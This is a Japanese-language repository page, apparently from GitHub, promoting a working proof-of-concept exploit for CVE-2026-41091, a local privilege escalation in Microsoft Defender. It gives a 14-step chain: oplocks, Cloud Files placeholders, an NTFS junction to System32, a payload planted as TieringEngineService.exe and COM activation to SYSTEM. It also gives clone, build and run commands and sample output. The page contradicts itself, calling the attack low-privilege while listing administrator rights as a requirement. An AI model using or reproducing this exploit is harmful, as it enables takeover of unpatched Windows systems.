ใ‚ขใƒƒใƒ—ใƒ‡ใƒผใƒˆไธ€่ฆงใซๆˆปใ‚‹
New releaseAug 20, 2026

CVE-2026-41091-PoC-Exploit Full-PoCv2

CVE-2026-41091 RedSun | Microsoft Defender LPE ใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใ€‚ไฝŽ็‰นๆจฉใƒฆใƒผใ‚ถใƒผใŒ Cloud Files API + NTFS ใ‚ธใƒฃใƒณใ‚ฏใ‚ทใƒงใƒณใฎใƒˆใƒชใƒƒใ‚ฏใซใ‚ˆใ‚Š NT AUTHORITY\SYSTEM ๐Ÿ”ฅ ใ‚’ๅ–ๅพ—ใ€‚Defender ใซ SYSTEM ๆจฉ้™ใงๆ‚ชๆ„ใฎใ‚ใ‚‹ใƒšใ‚คใƒญใƒผใƒ‰ใ‚’ System32 ใซๆ›ธใ่พผใพใ›ใ‚‹ใ€‚โš ๏ธ ๅฎŸ้š›ใซๆดป็™บใซๆ‚ช็”จใ•ใ‚Œใฆใ„ใพใ™ใ€‚CVSS 7.8ใ€‚ใƒ‘ใƒƒใƒ: Defender Engine 1.1.26040.8ใ€‚๐Ÿ›ก๏ธ ๆ•™่‚ฒ็›ฎ็š„ใฎ PoC ใฎใฟใ€‚

ๅ…ฑๆœ‰

SolarFlare

โ˜€๏ธ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE ใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ

C++ Windows License CVSS CISA KEV

Microsoft Defender ใƒชใƒณใ‚ฏใƒ•ใ‚ฉใƒญใƒผใ‚คใƒณใ‚ฐ่„†ๅผฑๆ€ง - NT AUTHORITY\SYSTEM ใธใฎใƒญใƒผใ‚ซใƒซ็‰นๆจฉๆ˜‡ๆ ผ

ใ“ใฎ่„†ๅผฑๆ€งใฏ "RedSun" ๐ŸŽฏ ใจใ—ใฆ็Ÿฅใ‚‰ใ‚ŒใฆใŠใ‚Šใ€"SolarFlare" ใฏ็งใŒใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใซไป˜ใ‘ใŸๅๅ‰ใงใ™ใ€‚ โœ…

๐Ÿ“Œ ๆฆ‚่ฆ

ใ“ใฎใƒชใƒใ‚ธใƒˆใƒชใซใฏใ€Microsoft Defender (Microsoft Malware Protection Engine) ใซใŠใ‘ใ‚‹้‡ๅคงใชใƒญใƒผใ‚ซใƒซ็‰นๆจฉๆ˜‡ๆ ผ่„†ๅผฑๆ€ง CVE-2026-41091 ใฎๅฎŒๅ…จๅ‹•ไฝœใ™ใ‚‹ Proof of Concept (PoC) ใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใŒๅซใพใ‚Œใฆใ„ใพใ™ใ€‚ไธ้ฉๅˆ‡ใชใƒชใƒณใ‚ฏ่งฃๆฑบ (CWE-59) ใ‚’ๆ‚ช็”จใ™ใ‚‹ใ“ใจใงใ€่ช่จผใ•ใ‚ŒใŸไฝŽๆจฉ้™ใฎๆ”ปๆ’ƒ่€…ใฏ NT AUTHORITY\SYSTEM ๆจฉ้™ใ‚’ๅ–ๅพ—ใงใใพใ™ใ€‚

ใ“ใฎ่„†ๅผฑๆ€งใฏ "RedSun" ใพใŸใฏ "SolarFlare" ใจใ—ใฆใ‚‚็Ÿฅใ‚‰ใ‚Œใ€Cloud Files API (CfAPI) ใจ NTFS ใ‚ธใƒฃใƒณใ‚ฏใ‚ทใƒงใƒณใƒใ‚คใƒณใƒˆใ‚’ไฝฟ็”จใ—ใฆใ€ๆ”ปๆ’ƒ่€…ใŒ Microsoft Defender ใ‚’้จ™ใ—ใ€SYSTEM ๆจฉ้™ใงไฟ่ญทใ•ใ‚ŒใŸใ‚ทใ‚นใƒ†ใƒ ใฎๅ ดๆ‰€ใซไปปๆ„ใฎใƒ•ใ‚กใ‚คใƒซใ‚’ๆ›ธใ่พผใ‚€ใ“ใจใ‚’ๅฏ่ƒฝใซใ—ใพใ™ใ€‚

ๆณจ: ใ“ใฎใƒชใƒใ‚ธใƒˆใƒชใซใฏ 2 ใคใฎใƒใƒผใ‚ธใƒงใƒณใŒๅซใพใ‚Œใฆใ„ใพใ™:

  • basic_poc.cpp - ็ฐก็•ฅๅŒ–ใ•ใ‚ŒใŸใ‚ขใƒซใ‚ดใƒชใ‚บใƒ ใฎใƒ‡ใƒข (ๆ•™่‚ฒ็”จ)
  • full_poc.cpp - ใ™ในใฆใฎๆฉŸ่ƒฝใ‚’ๅ‚™ใˆใŸๅฎŒๅ…จใชใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ

๐Ÿ”ฅ ไธปใชๆฉŸ่ƒฝ

ใ‚ซใƒ†ใ‚ดใƒชๆฉŸ่ƒฝ
ๆ‚ช็”จโœ… SYSTEM ใธใฎใƒญใƒผใ‚ซใƒซ็‰นๆจฉๆ˜‡ๆ ผ
โœ… Cloud Files API (CfAPI) ็ตฑๅˆ
โœ… ใ‚ฏใƒฉใ‚ฆใƒ‰ใƒ—ใƒฌใƒผใ‚นใƒ›ใƒซใƒ€ใƒผใฎไฝœๆˆ
โœ… NTFS ใ‚ธใƒฃใƒณใ‚ฏใ‚ทใƒงใƒณใƒชใƒ€ใ‚คใƒฌใ‚ฏใƒˆ
ใƒ†ใ‚ฏใƒ‹ใƒƒใ‚ฏโœ… ใƒใƒƒใƒ Oplock ๆ‚ช็”จ
โœ… VSS ใ‚นใƒŠใƒƒใƒ—ใ‚ทใƒงใƒƒใƒˆๆคœๅ‡บ
โœ… EICAR ใƒˆใƒชใ‚ฌใƒผ
โœ… COM ใ‚ตใƒผใƒ“ใ‚นใ‚ขใ‚ฏใƒ†ใ‚ฃใƒ™ใƒผใ‚ทใƒงใƒณ
ใ‚ฟใƒผใ‚ฒใƒƒใƒˆโœ… Microsoft Defender < 1.1.26040.8
โœ… Windows 10/11
โœ… Windows Server 2019/2022
ใƒฆใƒผใ‚ถใƒ“ใƒชใƒ†ใ‚ฃโœ… ่ฉณ็ดฐใชใƒญใ‚ฐ่จ˜้Œฒ
โœ… ใ‚จใƒฉใƒผใƒใƒณใƒ‰ใƒชใƒณใ‚ฐ
โœ… ใƒฉใƒณใƒ€ใƒ ใชใƒ‡ใ‚ฃใƒฌใ‚ฏใƒˆใƒชๅ
โœ… ่‡ชๅ‹•ใ‚ฏใƒชใƒผใƒณใ‚ขใƒƒใƒ—

๐ŸŽฏ ่„†ๅผฑๆ€งใฎ่ฉณ็ดฐ

ๅฑžๆ€งๅ€ค
CVE IDCVE-2026-41091
CVSS ใ‚นใ‚ณใ‚ข7.8 (้ซ˜)
CVSS VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ๆ”ปๆ’ƒใƒ™ใ‚ฏใƒˆใƒซใƒญใƒผใ‚ซใƒซ
ๅฟ…่ฆใชๆจฉ้™ไฝŽ
ใƒฆใƒผใ‚ถใƒผๅฏพ่ฉฑใชใ—
ๅฝฑ้ŸฟSYSTEM ใƒฌใƒ™ใƒซใฎใ‚ณใƒผใƒ‰ๅฎŸ่กŒ
CISA KEVโœ… ใฏใ„ (ๅฎŸ้š›ใซๆ‚ช็”จไธญ)
ๅˆฉ็”จๅฏ่ƒฝใชใƒ‘ใƒƒใƒMicrosoft Malware Protection Engine 1.1.26040.8

๐Ÿ“ฆ ๅฝฑ้Ÿฟใ‚’ๅ—ใ‘ใ‚‹่ฃฝๅ“

่ฃฝๅ“ๅฝฑ้Ÿฟใ‚’ๅ—ใ‘ใ‚‹ใƒใƒผใ‚ธใƒงใƒณไฟฎๆญฃใƒใƒผใ‚ธใƒงใƒณ
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

๐Ÿ”ฌ ใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใƒใ‚งใƒผใƒณ

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ SOLARFLARE EXPLOIT CHAIN                                                    โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                              โ”‚
โ”‚ 1. Create Working Directory                                                 โ”‚
โ”‚    โ””โ”€> %TEMP%\SF-XXXX\                                                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 2. Trigger Defender with EICAR                                              โ”‚
โ”‚    โ””โ”€> Write reversed EICAR to bait file                                    โ”‚
โ”‚                                                                              โ”‚
โ”‚ 3. Wait for VSS Snapshot                                                    โ”‚
โ”‚    โ””โ”€> Detect Volume Shadow Copy creation                                   โ”‚
โ”‚                                                                              โ”‚
โ”‚ 4. Create First Batch Oplock                                                โ”‚
โ”‚    โ””โ”€> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 5. Wait for Oplock Break                                                    โ”‚
โ”‚    โ””โ”€> Acquire exclusive access                                             โ”‚
โ”‚                                                                              โ”‚
โ”‚ 6. Rename Directory                                                         โ”‚
โ”‚    โ””โ”€> Move original directory to .tmp                                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 7. Register Cloud Sync Root                                                 โ”‚
โ”‚    โ””โ”€> CfRegisterSyncRoot with Cloud Files API                              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 8. Create Cloud Placeholder                                                 โ”‚
โ”‚    โ””โ”€> CfCreatePlaceholders for bait file                                   โ”‚
โ”‚                                                                              โ”‚
โ”‚ 9. Create Second Batch Oplock                                               โ”‚
โ”‚    โ””โ”€> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      โ”‚
โ”‚                                                                              โ”‚
โ”‚ 10. Wait for Second Oplock Break                                            โ”‚
โ”‚     โ””โ”€> Acquire exclusive access                                            โ”‚
โ”‚                                                                              โ”‚
โ”‚ 11. Rename Cloud Directory                                                  โ”‚
โ”‚     โ””โ”€> Move cloud directory to .cloud.tmp                                  โ”‚
โ”‚                                                                              โ”‚
โ”‚ 12. Create NTFS Junction to System32                                        โ”‚
โ”‚     โ””โ”€> Redirect to C:\Windows\System32                                     โ”‚
โ”‚                                                                              โ”‚
โ”‚ 13. Copy Payload to System32                                                โ”‚
โ”‚     โ””โ”€> Copy bait file to System32 as TieringEngineService.exe              โ”‚
โ”‚                                                                              โ”‚
โ”‚ 14. Activate Service as SYSTEM                                              โ”‚
โ”‚     โ””โ”€> CoCreateInstance(StorageTiersManagement)                            โ”‚
โ”‚                                                                              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

๐Ÿ“ฆ ใ‚คใƒณใ‚นใƒˆใƒผใƒซ

ๅ‰ๆๆกไปถ

  • Windows 10/11 ใพใŸใฏ Windows Server 2019/2022
  • Visual Studio 2019/2022 (C++ ใƒ„ใƒผใƒซไป˜ใ)
  • ็ฎก็†่€…ๆจฉ้™ (ๅฎŸ่กŒ็”จ)

ใƒ“ใƒซใƒ‰

# ใƒชใƒใ‚ธใƒˆใƒชใ‚’ใ‚ฏใƒญใƒผใƒณ
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Visual Studio Developer Command Prompt ใ‚’ไฝฟ็”จใ—ใฆใƒ“ใƒซใƒ‰
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# ใพใŸใฏๅŸบๆœฌใƒใƒผใ‚ธใƒงใƒณใ‚’ใƒ“ใƒซใƒ‰
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

๐Ÿ› ๏ธ ไฝฟ็”จๆ–นๆณ•

ๅฎŒๅ…จใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ (SYSTEM ๆจฉ้™ๆ˜‡ๆ ผ)

full_poc.exe

ๅŸบๆœฌใ‚ขใƒซใ‚ดใƒชใ‚บใƒ ใฎใƒ‡ใƒข

basic_poc.exe

๐Ÿ“‹ ๅ‡บๅŠ›ไพ‹

ๅฎŒๅ…จใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆๅ‡บๅŠ›

CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

ๅŸบๆœฌ PoC ๅ‡บๅŠ›

CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

๐Ÿ”ง ใƒ“ใƒซใƒ‰ๆ‰‹้ †

Visual Studio ใ‚’ไฝฟ็”จ

  1. Visual Studio 2022 ็”จ้–‹็™บ่€…ใ‚ณใƒžใƒณใƒ‰ใƒ—ใƒญใƒณใƒ—ใƒˆใ‚’้–‹ใ
  2. ใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใƒ‡ใ‚ฃใƒฌใ‚ฏใƒˆใƒชใซ็งปๅ‹•
  3. ๅฎŸ่กŒ:
# ๅฎŒๅ…จใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# ๅŸบๆœฌ PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

CMake ใ‚’ไฝฟ็”จ

cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

โš ๏ธ ่ฆไปถใจๅˆถ้™ไบ‹้ …

่ฆไปถ่ฉณ็ดฐ
OSWindows 10/11, Server 2019/2022
ๆจฉ้™็ฎก็†่€… (ๅฎŸ่กŒ็”จ)
DefenderMicrosoft Defender ใŒๆœ‰ๅŠนใงใ‚ใ‚‹ๅฟ…่ฆใŒใ‚ใ‚Šใพใ™
ใ‚คใƒณใ‚ฟใƒผใƒใƒƒใƒˆVSS ใ‚นใƒŠใƒƒใƒ—ใ‚ทใƒงใƒƒใƒˆๆคœๅ‡บใซๅฟ…่ฆ
ใƒ‘ใƒƒใƒใƒ‘ใƒƒใƒๆœช้ฉ็”จใฎใ‚ทใ‚นใƒ†ใƒ ใงใฎใฟๅ‹•ไฝœ
ใ‚ขใƒผใ‚ญใƒ†ใ‚ฏใƒใƒฃx64 ใฎใฟ

๐Ÿ”— ้–ข้€ฃใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ

ไป–ใฎใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆใƒชใƒใ‚ธใƒˆใƒชใ‚‚ใ”่ฆงใใ ใ•ใ„:

  • CVE-2026-24061-PoC-Exploit - GNU inetutils-telnetd ่ช่จผใƒใ‚คใƒ‘ใ‚น
  • CVE-2026-41940-PoC-Exploit - cPanel/WHM ่ช่จผใƒใ‚คใƒ‘ใ‚นใ‚จใ‚ฏใ‚นใƒ—ใƒญใ‚คใƒˆ
  • CVE-2026-0073-PoC-Exploit - Android ADB ใƒฏใ‚คใƒคใƒฌใ‚นใƒ‡ใƒใƒƒใ‚ฐ่ช่จผใƒใ‚คใƒ‘ใ‚น

ใ‚ซใƒ†ใ‚ดใƒช